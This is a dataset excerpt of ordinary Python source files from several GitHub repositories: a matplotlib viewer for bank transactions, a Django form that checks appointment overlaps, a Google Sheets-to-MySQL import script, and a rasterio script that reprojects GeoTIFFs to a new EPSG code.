1.0)\nGREY = (0.5019607843137255, 0.5450980392156862, 0.5882352941176471, 1)\nGREEN = (0.098039215686274508, 0.43529411764705883, 0.23921568627450981, 1.0)\nDARK_GREEN = (0.0078431372549019607, 0.25490196078431371, 0.0078431372549019607, 1.0)\nPURPLE = (0.6666666666666666, 0.6745098039215687 ,0.8862745098039215,1.0)\nLIGHT_GREEN = (0.1568627450980392, 0.7058823529411765, 0.38823529411764707, 1.0)\nLIGHT_RED = (1.0, 0.2784313725490196, 0.2784313725490196, 1.0)\nLIGHT_GREY = (0.8352941176470589, 0.8470588235294118, 0.8627450980392157,1.0)\n\n# width = 0.3\nWIDTH = 12\nG_RAT = (1 + 5 ** 0.5) / 2 # golden ratio\nLABEL_ROTATION = 15 # DEGREES\nDATEFORMATSTRING = '%Y-%m-%d'\nDATEFROMAT = mdates.DateFormatter(DATEFORMATSTRING)\n# to highlight recatangles\ndark2light={DARK_RED:LIGHT_RED, DARK_GREEN:LIGHT_GREEN}\n# to unhighlight recatangles\ndark2normal={DARK_RED:RED, DARK_GREEN:GREEN}\nlight2normal={LIGHT_RED:RED, LIGHT_GREEN:GREEN}\n \nclass financeViewer():\n \n def __init__(self):\n\n self.box = dict(facecolor='blue', pad=3, alpha=0.2, boxstyle=\"Round4,pad=0.3\")\n self.transactionString =\"\"\"Date: {}\n Sum: {} HUF\n Comment: {}\"\"\"\n self.initString = \"\"\"\n Select a period to inspect transactions\n using your mouse, or change the settings\n \"\"\"\n \n self.scale1='log'\n self.scale2='log'\n self.mode = 'transaction' # the other mode is balance mode, modifies the top plot\n \n self.start, self.end = None, None\n \n def createFigure(self):\n # disable toolbar\n matplotlib.rcParams['toolbar'] = 'None'\n self.fig = plt.figure(figsize=(WIDTH, WIDTH/G_RAT),facecolor = LIGHT_GREY)\n\n self.gsp = gridspec.GridSpec(\n nrows = 3, ncols = 2, wspace = 0.05, hspace = 0.45,\n width_ratios = [G_RAT, 1], height_ratios = [(1+G_RAT)/G_RAT, G_RAT, 1])\n\n self.ax1 = plt.subplot(self.gsp[0,:])\n self.ax2 = plt.subplot(self.gsp[1:,0])\n self.ax3 = plt.subplot(self.gsp[2,1])\n self.ax4 = plt.subplot(self.gsp[1,1])\n\n def drawAxes(self):\n\n for ax in [self.ax1,self.ax2,self.ax3, self.ax4]: \n ax.set_facecolor(GREY)\n \n #####BIG PLOT## \n self.plotAx1()\n \n ####ZOOM PLOT##\n self.plotAx2()\n \n ##info plot##\n self.txt = self.ax3.text(0.1,0.5,self.initString,\n horizontalalignment='left',\n verticalalignment='center',\n fontsize=13, color='black',\n wrap = True)\n self.ax3.set_xticks([]) \n self.ax3.set_yticks([]) \n self.ax3.set_title('info about the transactions', bbox=self.box)\n\n ### place of buttons##\n self.ax4.set_xticks([]) \n self.ax4.set_yticks([]) \n\n def on_plot_hover(self, event):\n\n if not event.inaxes: return\n if event.inaxes!= self.ax2: return\n\n for idx,bar in enumerate(self.ax2.patches):\n if bar.get_x() < event.xdata < bar.get_x() + bar.get_width():\n if bar.get_y() < event.ydata < bar.get_y() + bar.get_height(): \n\n self.ax2.patches[idx].set_facecolor(dark2light[bar.get_edgecolor()])\n date_ordinal, y = self.ax2.transData.inverted().transform([event.x, event.y])+0.5\n \n # convert the numeric date into a datetime\n transDate = num2date(date_ordinal).strftime(DATEFORMATSTRING)\n pdDate = num2date(date_ordinal).strftime('%Y%m%d')\n try:\n comment = self.cleanDf.loc[(self.cleanDf['date'] == int(pdDate)) & (abs(self.cleanDf['sum'],)==bar.get_height()),'comment'].iloc[0]\n except:\n comment='Record not found'\n\n newStr = self.transactionString.format(transDate,bar.get_height(), comment)\n self.txt.set_text(newStr)\n else:\n self.ax2.patches[idx].set_facecolor(dark2normal[bar.get_edgecolor()])\n self.fig.canvas.draw()\n\n def reset_button_on_clicked(self, mouse_event): \n self.plotAx2()\n\n def balanceView_button_on_clicked(self, mouse_event):\n self.txt.set_text('Not implemented yet')\n\n def transView_button_on_clicked(self, mouse_event):\n self.txt.set_text('Not implemented yet')\n\n def plotAx2(self,): \n self.ax2.cla()\n self.ax2.set_title('Selected duration', bbox=self.box)\n if self.start != None:\n startDate = self.pdRange[self.start]\n endDate = self.pdRange[self.end]\n currentRange = pd.date_range(start=startDate, end=endDate, periods=None, freq='D', )\n indexes = []\n \n for idx, day in enumerate(self.incomeX):\n if (len(np.where(currentRange==day)[0])):\n indexes.append(idx)\n currIncomeX = np.array(self.incomeX)[indexes]\n currIncomeY = np.array(self.incomeY)[indexes]\n\n else:\n currentRange = self.pdRange\n currIncomeX = self.incomeX\n currIncomeY = self.incomeY\n \n baseArray = np.zeros(len(currentRange),dtype=np.float)\n \n self.ax2.bar(currIncomeX, currIncomeY, color=GREEN, edgecolor=DARK_GREEN)\n \n for expenseX, expenseY in zip(self.expenseXs, self.expenseYs):\n ## calculate bottom for this iteration\n currBottomIdxs =[]\n indexes = []\n\n for idx, day in enumerate(expenseX):\n if len(np.where(currentRange==day)[0]):\n currBottomIdxs.append(np.where(currentRange==day)[0][0])\n indexes.append(idx)\n\n expenseX = np.array(expenseX)[indexes]\n expenseY = np.array(expenseY)[indexes]\n bottom = baseArray[currBottomIdxs]\n self.ax2.bar(expenseX,expenseY,bottom=bottom, color=RED, edgecolor=DARK_RED)\n ### calculate baseArray for the next iteration\n\n baseArray[currBottomIdxs] += expenseY\n \n if self.start != None and self.end-self.start <= 4:\n print (333)\n self.ax2.xaxis.set_major_locator(DayLocator())\n \n self.ax2.xaxis.set_major_formatter(DATEFROMAT)\n self.ax2.set_yscale(self.scale2, nonposy='clip')\n self.ax2.yaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\n plt.setp( self.ax2.xaxis.get_majorticklabels(), rotation=LABEL_ROTATION )\n \n def plotAx1(self):\n \n self.ax1.cla()\n self.ax1.set_title('Whole duration',bbox=self.box)\n \n if self.mode == 'transaction':\n self.plotAx1_transaction()\n elif self.mode == 'balance':\n self.plotAx1_balance()\n else :\n raise ValueError('selected mode not supported: %s' % self.mode)\n \n \n self.span = SpanSelector(self.ax1, self.onselect, 'horizontal', \n rectprops=dict(alpha=0.3, facecolor=RED))\n \n self.ax1.xaxis.set_major_formatter(DATEFROMAT)\n self.ax1.set_yscale(self.scale1, nonposy='clip')\n self.ax1.yaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\n plt.setp( self.ax1.xaxis.get_majorticklabels(), rotation=LABEL_ROTATION )\n \n def plotAx1_balance(self):\n\n self.ax1.step(self.pdDates, self.balance, marker=\"d\", color = DARK_RED) \n \n def plotAx1_transaction(self):\n self.ax1.bar(self.incomeX, self.incomeY, color=GREEN,edgecolor=DARK_GREEN)\n \n baseArray = np.zeros(len(self.pdRange),dtype=np.float)\n for expenseX, expenseY in zip(self.expenseXs, self.expenseYs):\n ## calculate bottom for this iteration\n currBottomIdxs = [np.where(self.pdRange==day)[0][0] for day in expenseX]\n bottom = baseArray[currBottomIdxs]\n self.ax1.bar(expenseX,expenseY,bottom=bottom, color=RED, edgecolor=DARK_RED)\n ### calculate baseArray for the next iteration\n\n baseArray[currBottomIdxs] += expenseY \n \n def onselect(self, xmin, xmax):\n\n dayMin, dayMax = sorted((int(xmin-0.5), int(xmax+0.5)))\n ##xmin, xmax is days from zero, if Xaxis is pandas daterange\n yearZero = datetime.datetime.strptime('0001/01/01', \"%Y/%m/%d\")\n startDate = yearZero + timedelta(days=dayMin)\n endDate = yearZero + timedelta(days=dayMax)\n st=str(startDate)[:10]\n nd=str(endDate)[:10]\n\n stIdx, = np.where( self.pdRange.values==np.datetime64(st) )\n endIdx, = np.where( self.pdRange.values==np.datetime64(nd) )\n\n if stIdx and endIdx: \n stIdx , endIdx = stIdx[0], endIdx[0]\n # start and endpoints in of range\n elif stIdx:\n stIdx , endIdx = stIdx[0], len(self.pdRange)-1\n # endpoint out of range\n elif endIdx:\n stIdx , endIdx = 0, endIdx[0]\n # startpoint out of range \n else:\n # start and endpoints are out of range \")\n return\n\n self.start, self.end = stIdx, endIdx\n \n ist = int(st.replace(\"-\", \"\"))\n ind = int(nd.replace(\"-\", \"\"))\n\n selectedBalance = self.balance[(self.dateAxis>ist) & (self.dateAxis< ind)]\n selectionString = \"\"\"\n Selection: {} - {}\n Starting balance: {} HUF\n Final balance: {} HUF\n Difference: {} HUF\n \"\"\".format(st,nd, selectedBalance[0], selectedBalance[-1], selectedBalance[-1]-selectedBalance[0])\n self.txt.set_text(selectionString)\n\n self.plotAx2()\n self.fig.canvas.draw()\n \n def makeButtons(self):\n\n pos = self.ax4.get_position() # get the position of axis ,which contains the buttons \n self.ax4.set_title('plot properties',bbox=self.box)\n rowNr, colNr = 2,2\n buttonwidth = 0.13\n buttonheight = 0.07\n Vspace = (pos.width - colNr*buttonwidth)/(colNr+1)\n Hspace = (pos.height - rowNr*buttonheight)/(rowNr+1)\n ## radio buttons\n scaleSelectorAx1 = self.fig.add_axes([pos.x0+Vspace, pos.y0+2*Hspace+buttonheight, buttonwidth, buttonheight],facecolor=PURPLE)\n scaleSelectorAx2 = self.fig.add_axes([pos.x0+Vspace, pos.y0+Hspace, buttonwidth, buttonheight],facecolor=PURPLE)\n modeSelectorAx1 = self.fig.add_axes([pos.x0+2*Vspace+buttonwidth, pos.y0+2*Hspace+buttonheight, buttonwidth, buttonheight],facecolor=PURPLE)\n \n scaleSelectorAx1.set_title('top plot scale',fontsize=12)\n scaleSelectorAx2.set_title('bottom plot scale',fontsize=12)\n modeSelectorAx1.set_title('top plot mode',fontsize=12)\n \n axcolor = PURPLE\n self.scaleSelector1 = RadioButtons(scaleSelectorAx1, ('logaritmic','linear'))\n self.scaleSelector2 = RadioButtons(scaleSelectorAx2, ('logaritmic','linear'))\n self.modeSelector = RadioButtons(modeSelectorAx1, ('transaction view', 'balance view'))\n \n for button in [self.scaleSelector1, self.scaleSelector2, self.modeSelector]:\n for circle in button.circles: # adjust radius here. The default is 0.05\n circle.set_radius(0.09)\n circle.set_edgecolor('black')\n \n ## small buttons\n resetAx = self.fig.add_axes([pos.x0+2*Vspace+buttonwidth, pos.y0+Hspace, buttonwidth/2, buttonheight])\n helpAx = self.fig.add_axes([pos.x0+2*Vspace+1.5*buttonwidth, pos.y0+Hspace, buttonwidth/2, buttonheight])\n self.resetBtn = Button(resetAx, 'Reset', color = PURPLE, hovercolor = DARK_RED)\n self.helpBtn = Button(helpAx, 'About', color = PURPLE, hovercolor = DARK_RED)\n\n def resetClicked(self,event):\n\n self.scale1='log'\n self.scale2='log'\n self.mode = 'transaction'\n self.start=None\n self.end = None\n self.plotAx1()\n self.plotAx2()\n self.scaleSelector1.set_active(0)\n self.scaleSelector2.set_active(0)\n self.modeSelector.set_active(0)\n self.fig.canvas.draw()\n\n def helpClicked(self,event):\n pass\n print ('help')\n helpText = \"\"\"Go to\n github.com/Wheele9/transaction-viewer\n to get the latest version, \n to create an issue or pull request.\n Feel free to contact me.\"\"\"\n self.txt.set_text(helpText)\n \n def modeButtonClicked(self, label):\n print (label)\n if label == 'balance view':\n if self.mode == 'balance': return\n self.mode = 'balance'\n self.scale1 = 'linear'\n self.plotAx1()\n elif label == 'transaction view':\n if self.mode == 'transaction': return\n self.mode = 'transaction'\n self.plotAx1()\n else: \n raise ValueError('could not find %s' % label)\n print ('clicked,', self.mode)\n self.fig.canvas.draw()\n \n def scaleButton1Clicked(self, label):\n\n if label == 'linear':\n if self.scale1 == 'linear': return\n self.scale1='linear'\n self.plotAx1()\n elif label == 'logaritmic':\n if self.scale1 == 'logaritmic': return\n self.scale1='log'\n self.plotAx1()\n else: raise ValueError('could not find %s' % label)\n self.fig.canvas.draw()\n \n def scaleButton2Clicked(self, label):\n\n if label == 'linear':\n if self.scale2 == 'linear': return\n self.scale2='linear'\n self.plotAx2()\n elif label == 'logaritmic':\n if self.scale2 == 'logaritmic': return\n self.scale2='log'\n self.plotAx2()\n else: raise ValueError('could not find %s' % label)\n self.fig.canvas.draw()\n \n def connectButtons(self):\n\n self.scaleSelector1.on_clicked(self.scaleButton1Clicked)\n self.scaleSelector2.on_clicked(self.scaleButton2Clicked)\n self.modeSelector.on_clicked(self.modeButtonClicked)\n \n self.resetBtn.on_clicked(self.resetClicked)\n self.helpBtn.on_clicked(self.helpClicked)\n \n def calculateAttributes(self):\n \n self.balance = self.cleanDf['balance'].values\n self.dateAxis = self.cleanDf['date'].values\n self.transactions = self.cleanDf['sum'].values\n self.pdDates = [pd.to_datetime(str(date), format='%Y%m%d') for date in self.dateAxis]\n\n start = self.pdDates[0]\n end = self.pdDates[-1]\n self.pdRange = pd.date_range(start=start, end=end, periods=None, freq='D', )\n\n def separateTransactions(self):\n\n values, counts = np.unique(self.pdDates, return_counts=True)\n maxPerDay = max(counts)\n\n expenseXs, expenseYs = [], []\n incomeX, incomeY = [], []\n smallX, smallY = [], []\n\n for freq in range(1,max(counts)+1):\n for val, cnt in zip(values, counts):\n if cnt >= freq:\n index = np.where(np.array(self.pdDates)==val)[0][freq-1]\n if self.transactions[index] > 0:\n incomeX.append(val)\n incomeY.append(self.transactions[index])\n else:\n smallX.append(val)\n smallY.append(-self.transactions[index])\n\n expenseXs.append(smallX) \n expenseYs.append(smallY) \n smallX, smallY = [], []\n\n self.expenseXs = expenseXs\n self.expenseYs = expenseYs\n self.incomeX = incomeX\n self.incomeY = incomeY\n \n def showPlots(self, cleanDf):\n self.cleanDf = cleanDf\n self.calculateAttributes()\n self.separateTransactions()\n \n self.createFigure()\n self.drawAxes()\n\n self.fig.canvas.mpl_connect('button_press_event', self.on_plot_hover) \n self.fig.subplots_adjust(left=0.06, bottom=0.07, right=0.97, top=0.95)\n \n self.makeButtons()\n self.connectButtons()\n\n plt.show()\n\nfolder='matyi'\n# folder='.'\n\nfiles =[os.path.join(folder,file) for file in os.listdir(folder) if file.lower().endswith('csv')]\n\nmodel = otpParser()\nview = financeViewer()\n\nmyApp = Presenter(model, view, files)\n\nmyApp.showPlots()\n\n\n", "repo_name": "Wheele9/transaction-viewer", "sub_path": "transactionViewer.py", "file_name": "transactionViewer.py", "file_ext": "py", "file_size_in_byte": 18714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.dates.num2date", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.dates.num2date", "line_number": 167, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.dates.DayLocator", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.widgets.SpanSelector", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.widgets.RadioButtons", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Button", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Button", "line_number": 352, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 434, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 434, "usage_type": "argument"}, {"api_name": "pandas.date_range", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 452, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 483, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 483, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 488, "usage_type": "call"}]} +{"seq_id": "8551207232", "text": "from django.core.exceptions import ValidationError\nfrom django.forms.models import BaseModelForm, ModelFormMetaclass\nfrom .models import Unavailable, Appointment\n\nfrom django.utils import timezone\n\n\n# An abstract form that inherits methods used by both Appointment and UnavailableTime\n# models to perform cleaning that are unique to them both.\nclass AbstractDurationForm(BaseModelForm, metaclass=ModelFormMetaclass):\n\n def clean(self):\n self.extra_checks()\n super().clean()\n\n def extra_checks(self, model=None):\n # Field sanity checks\n self.check_future_time(\"start_time\")\n self.check_future_time(\"end_time\")\n self.check_positive_duration(\"start_time\", \"end_time\")\n # Overlaps\n if not model:\n model = self._meta.model\n self.check_for_overlaps(model)\n\n def check_for_overlaps(self, model):\n message = \"Please set an earlier or later date\"\n doctor = self.cleaned_data.get(\"doctor\")\n start_time = self.cleaned_data.get(\"start_time\")\n end_time = self.cleaned_data.get(\"end_time\")\n model = model\n doctors_appointments = model.objects.filter(doctor=doctor)\n # Check for overlapping appointments\n if doctors_appointments.filter(start_time=start_time):\n raise ValidationError({\"start_time\": message})\n if doctors_appointments.filter(start_time__lt=start_time) \\\n .filter(end_time__gte=start_time):\n raise ValidationError({\"start_time\": message})\n if doctors_appointments.filter(start_time__gt=start_time) \\\n .filter(start_time__lt=end_time):\n raise ValidationError({\"start_time\": message})\n\n # Check that time filled in form isn't in the past or present\n def check_future_time(self, field: str):\n now = timezone.now()\n time_to_set = self.cleaned_data.get(field)\n time_delta = time_to_set - now\n if time_delta.total_seconds() <= 0:\n raise ValidationError({field: \"Please set a later time\"})\n\n # Check that ending is ahead of starting\n def check_positive_duration(self, field_1: str, field_2: str):\n earlier = self.cleaned_data.get(field_1)\n later = self.cleaned_data.get(field_2)\n time_delta = later - earlier\n\n if time_delta.total_seconds() <= 0:\n message = f\"{field_2.title()} time must be ahead of {field_1.title()} time.\"\n raise ValidationError({field_2: message})\n\n\nclass UnavailableForm(AbstractDurationForm):\n\n class Meta:\n model = Unavailable\n exclude = [\"duration\", \"created\"]\n\n\nclass AppointmentForm(AbstractDurationForm):\n def extra_checks(self, model=None):\n super().extra_checks()\n model = Unavailable\n self.check_for_overlaps(model)\n\n class Meta:\n model = Appointment\n exclude = [\"duration, created\"]", "repo_name": "Agamiru/telemedicine_app", "sub_path": "appointments/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.models.BaseModelForm", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.models.ModelFormMetaclass", "line_number": 10, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 35, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 38, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 41, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 45, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 49, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Unavailable", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Unavailable", "line_number": 72, "usage_type": "name"}, {"api_name": "models.Appointment", "line_number": 76, "usage_type": "name"}]} +{"seq_id": "34274824680", "text": "# These are the libraries used for this project.\nimport gspread\nimport mysql.connector\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# This is the mysqlcredentials.py file containing your credentials.\nimport mysqlcredentials as mc\n\n# The required variables for gspread:\nscope = ['https://spreadsheets.google.com/feeds', \\\n\t'https://www.googleapis.com/auth/drive']\n\n# The credentials created for the service account in your Google project\n# is stored in a .json file after you click 'Create Key'\n# I renamed this file to sheetstodb.json.\ncreds = ServiceAccountCredentials.from_json_keyfile_name('sheetstodb.json', scope)\nclient = gspread.authorize(creds)\n\n# Now that that's done, pull data from the Google sheet.\n# 'sheetName' describes the Google sheet's name,\n# 'worksheetIndex' describes the index of the worksheet at the bottom.\ndef GetSpreadsheetData(sheetName, worksheetIndex):\n sheet = client.open(sheetName).get_worksheet(worksheetIndex)\n return sheet.get_all_values()[1:]\n\n# Finally, write this data to MySQL:\ndef WriteToMySQLTable(sql_data, tableName):\n try:\n# Connection credentials for MySQL.\n connection = mysql.connector.connect(\n user = mc.user,\n password = mc.password,\n host = mc.host,\n database = mc.database\n )\n sql_drop = \" DROP TABLE IF EXISTS {} \".format(tableName)\n sql_create_table = \"\"\"CREATE TABLE {}( \n username VARCHAR(255),\n date_taken VARCHAR(16),\n time_started VARCHAR(16),\n time_finished VARCHAR(16),\n answer_question_1 VARCHAR(255),\n answer_question_2 VARCHAR(255),\n answer_question_3 VARCHAR(255),\n answer_question_4 VARCHAR(255),\n answer_question_5 VARCHAR(255),\n answer_question_6 VARCHAR(255),\n PRIMARY KEY (username)\n )\"\"\".format(tableName)\n\n sql_insert_statement = \"\"\"INSERT INTO {}( \n username,\n date_taken,\n time_started,\n time_finished,\n answer_question_1,\n answer_question_2,\n answer_question_3,\n answer_question_4,\n answer_question_5,\n answer_question_6\n ) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\".format(tableName)\n# Here we create a cursor, which we will use to execute\n# the MySQL statements above. After each statement is executed,\n# a message will be printed to the console if the execution was successful.\n cursor = connection.cursor()\n cursor.execute(sql_drop)\n print('Table {} has been dropped'.format(tableName))\n cursor.execute(sql_create_table)\n print('Table {} has been created'.format(tableName))\n# We need to write each row of data to the table, so we use a for loop\n# that will insert each row of data one at a time\n for i in sql_data:\n cursor.execute(sql_insert_statement, i)\n# Now we execute the commit statement, and print to the console\n# that the table was updated successfully\n connection.commit()\n print(\"Table {} successfully updated.\".format(tableName))\n# Errors are handled in the except block, and we will get\n# the information printed to the console if there is an error\n except mysql.connector.Error as error :\n connection.rollback()\n print(\"Error: {}. Table {} not updated!\".format(error, tableName))\n# We need to close the cursor and the connection,\n# and this needs to be done regardless of what happened above.\n finally:\n cursor.execute('SELECT COUNT(*) FROM {}'.format(tableName))\n rowCount = cursor.fetchone()[0]\n print(tableName, 'row count:', rowCount)\n if connection.is_connected():\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed.\")\n\n\n# Replaces any empty cells with 'NULL'\ndef preserveNULLValues(listName):\n print('Preserving NULL values...')\n for x in range(len(listName)):\n for y in range(len(listName[x])):\n if listName[x][y] == '':\n listName[x][y] = None\n print('NULL values preserved.')\n\n# Uses Google Drive's API.\n# If you get an error regarding this, go to the link and enable it.\ndata = GetSpreadsheetData('rogoben', 0)\n\n# Write to the table in the database.\npreserveNULLValues(data)\nWriteToMySQLTable(data, 'MyData')\n", "repo_name": "queenmypawn/rogoben", "sub_path": "gsheetstodb.py", "file_name": "gsheetstodb.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 16, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 16, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 17, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 30, "usage_type": "name"}, {"api_name": "mysqlcredentials.user", "line_number": 31, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.password", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.host", "line_number": 33, "usage_type": "attribute"}, {"api_name": "mysqlcredentials.database", "line_number": 34, "usage_type": "attribute"}, {"api_name": "mysql.connector.connector", "line_number": 81, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "5139687446", "text": "import os, sys\nimport rasterio\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\ndef create_folder(root_path,name_add):\n parent = os.path.dirname(root_path)\n foder_name = os.path.basename(root_path)\n if not os.path.exists(os.path.join(parent,foder_name+'_'+name_add)):\n os.makedirs(os.path.join(parent,foder_name+'_'+name_add))\n path_create = os.path.join(parent,foder_name+'_'+name_add)\n # print('created: {}'.format(path_create))\n return path_create\n\ndef create_list_file_and_out_folder(path, name_folder):\n # create foler noi chua anh moi luon\n out_folder = create_folder(path, name_folder)\n print(\"Created folder output: {}\".format(out_folder))\n # het\n list_image = []\n for root, dirs, files in os.walk(path):\n # print(root)\n for file_ in files:\n if file_.endswith(\".tif\"):\n # list_image.append(os.path.join(root, file_))# trar veef list path\n list_image.append(file_)# trar veef list file\n return list_image, out_folder\n\ndef convert_epsg(image_path, out_path, out_epsg):\n crs_new = rasterio.crs.CRS({\"init\":\"epsg:{}\".format(out_epsg)})\n with rasterio.open(image_path) as src:\n image = src.read((1, 2, 3))\n tr = src.transform\n height = src.height\n width = src.width\n num_band = src.count\n dtypes = src.dtypes\n # print(dtypes[0])\n new_dataset = rasterio.open(out_path, 'w', driver='GTiff',\n height = height, width = width,\n count = num_band, dtype = dtypes[0],\n crs = crs_new,\n transform = tr,\n nodata = 0,\n compress='lzw')\n if num_band == 1:\n new_dataset.write(image, 1)\n else:\n for i in range(num_band):\n new_dataset.write(image[i],i+1)\n new_dataset.close()\n \ndef main():\n path_folder = os.path.abspath(sys.argv[1])\n epsg_new = int((sys.argv[2]))\n print(\"EPSG add: {}\".format(epsg_new))\n list_img, out_folder = create_list_file_and_out_folder(path_folder, str(epsg_new))\n for name_file in tqdm(list_img):\n convert_epsg(os.path.join(path_folder, name_file), os.path.join(out_folder, name_file), epsg_new)\n\nif __name__==\"__main__\":\n x1 = time.time()\n main()\n print(time.time() - x1, \"second\")\n\n\n\n\n\n\n# chay khong dung abspath\n# path_folder = r\"/media/skm/Image/cezch/Data_Cezch/test\"\n# epsg_new = 32633\n\n", "repo_name": "anhbn995/GOGOOK", "sub_path": "Proccesing_all/convert_epsg.py", "file_name": "convert_epsg.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, 